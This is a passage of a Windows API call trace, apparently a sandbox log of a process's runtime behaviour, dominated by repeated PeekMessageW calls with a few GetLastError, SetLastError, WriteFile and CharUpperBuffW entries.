lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.974] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.975] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.976] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.977] GetLastError () returned 0x6 [0026.977] SetLastError (dwErrCode=0x6) [0026.977] GetLastError () returned 0x6 [0026.977] SetLastError (dwErrCode=0x6) [0026.977] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x7b6ac0, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x6ad9e0, lpOverlapped=0x0) returned 0 [0026.977] GetLastError () returned 0x6 [0026.977] GetLastError () returned 0x6 [0026.977] SetLastError (dwErrCode=0x6) [0026.977] GetLastError () returned 0x6 [0026.977] SetLastError (dwErrCode=0x6) [0026.978] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.978] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.978] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.979] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.979] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.979] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.979] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.979] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.980] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.981] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.981] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.981] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.981] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.981] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.981] GetLastError () returned 0x6 [0026.981] SetLastError (dwErrCode=0x6) [0026.981] GetLastError () returned 0x6 [0026.981] SetLastError 